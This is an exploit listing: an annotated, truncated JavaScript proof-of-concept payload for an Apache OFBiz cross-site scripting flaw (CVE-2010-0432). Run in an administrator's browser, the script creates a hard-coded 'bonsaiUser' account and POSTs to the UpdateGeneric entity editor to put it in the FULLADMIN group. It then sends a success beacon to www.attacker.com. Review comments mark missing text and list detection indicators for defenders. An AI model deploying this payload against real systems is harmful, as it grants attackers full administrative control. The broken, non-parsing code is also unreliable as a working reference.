/* Apache OFBiz FULLADMIN Creator PoC Payload. CVE: CVE-2010-0432 By: Lucas Apa ( lucas -at- bonsai-sec.com ). Bonsai Information Security http://www.bonsai-sec.com/ */
// NOTE(review): this listing is incomplete and does not parse as written.
// Text is missing after the loop header below and inside every empty pair of
// parentheses before .toString() (presumably inline markup literals that were
// stripped when the page was extracted). The missing text is left as found.
//
// What the visible code shows: the script runs inside an OFBiz page in a
// browser (it uses document and XMLHttpRequest) and sends same-origin requests
// to /webtools/control/, so they carry the session of whoever renders the page.
// Per the header, the aim is an account with the FULLADMIN permission group.
//
// Points for defenders, all taken from the visible lines:
//   - a user login named bonsaiUser appearing in the user tables,
//   - POSTs to /webtools/control/UpdateGeneric with
//     entityName=UserLoginSecurityGroup that no administrator initiated,
//   - an outbound GET from an administrator browser to an unrelated host
//     right after such a POST.
// Applying the vendor fix for CVE-2010-0432 and output-encoding the affected
// fields removes the injection point this payload depends on.

// Hard-coded credentials for the account the PoC tries to register.
var username = 'bonsaiUser';
var password = 'bonsaiPass';

// Collects the elements with class fieldWidth300 from the current page.
// How they are used is not visible: the loop body is part of the lost text.
var nodes = document.getElementsByClassName('fieldWidth300');

// NOTE(review): truncated here. The loop condition, the loop body, the
// creation of xmlhttp2, the first str1 assignment and the definitions of
// externalKey and cookie (both read further down) are missing from the page.
for (var i=0; i).toString();
var str2 = ().toString();
var str3 = ().toString();

// First request body: fixed fragments with the password inserted twice and the
// username appended. The fragments themselves are not recoverable from here.
var post_data = str1 + password + str2 + password + str3 + username;
xmlhttp2.send(post_data);

// Second request object, created with the usual legacy fallbacks: two ActiveX
// ProgIDs, then native XMLHttpRequest, then window.createRequest.
var xmlhttp3=false;
try { xmlhttp3 = new ActiveXObject("Msxml2.XMLHTTP"); }
catch (e) {
  try { xmlhttp3 = new ActiveXObject("Microsoft.XMLHTTP"); }
  catch (E) { xmlhttp3 = false; }
}
if (!xmlhttp3 && typeof XMLHttpRequest!='undefined') {
  try { xmlhttp3 = new XMLHttpRequest(); }
  catch (e) { xmlhttp3=false; }
}
if (!xmlhttp3 && window.createRequest) {
  try { xmlhttp3 = window.createRequest(); }
  catch (e) { xmlhttp3=false; }
}

// Relative URL, so the POST goes to the OFBiz host that served the page.
// It targets the generic entity editor for UserLoginSecurityGroup and passes
// the externalLoginKey value held in externalKey (defined in the lost text).
xmlhttp3.open("POST", "/webtools/control/UpdateGeneric?entityName=UserLoginSecurityGroup&externalLoginKey="+externalKey,true);
xmlhttp3.onreadystatechange=function() {
  // readyState 4 means the response has been fully received.
  if (xmlhttp3.readyState==4) {
    // The response text is only pattern-matched for the entity name; the
    // script treats a match as success.
    if(/UserLoginSecurityGroup/.test(xmlhttp3.responseText)){
      // Third request object, same fallback chain as above.
      var xmlhttp4=false;
      try { xmlhttp4 = new ActiveXObject("Msxml2.XMLHTTP"); }
      catch (e) {
        try { xmlhttp4 = new ActiveXObject("Microsoft.XMLHTTP"); }
        catch (E) { xmlhttp4 = false; }
      }
      if (!xmlhttp4 && typeof XMLHttpRequest!='undefined') {
        try { xmlhttp4 = new XMLHttpRequest(); }
        catch (e) { xmlhttp4=false; }
      }
      if (!xmlhttp4 && window.createRequest) {
        try { xmlhttp4 = window.createRequest(); }
        catch (e) { xmlhttp4=false; }
      }
      // Completion beacon to an external host. It is a cross-origin GET, so
      // the request leaves the browser even though the script cannot read the
      // reply. Egress or proxy logs and a restrictive Content-Security-Policy
      // connect-src are the places to catch or block it.
      xmlhttp4.open("GET", " http://www.attacker.com/successful-ofbiz-attack.php?done=yes",true);
      xmlhttp4.send(null);
    }
  }
}
// NOTE(review): cookie is a forbidden request-header name for XMLHttpRequest,
// so current browsers ignore this call. The session cookie is attached to a
// same-origin request automatically, which is why marking it HttpOnly does not
// stop this kind of payload.
xmlhttp3.setRequestHeader("cookie",cookie);
xmlhttp3.setRequestHeader("content-type", "application/x-www-form-urlencoded");

// Second request body: two fixed fragments around the username. The fragment
// text was lost, same as for the first body.
var str1 = ().toString();
var str2 = ().toString();
var post_data2 = str1 + username + str2;
xmlhttp3.send(post_data2);
// These two braces close blocks opened in the lost text near the top.
}
}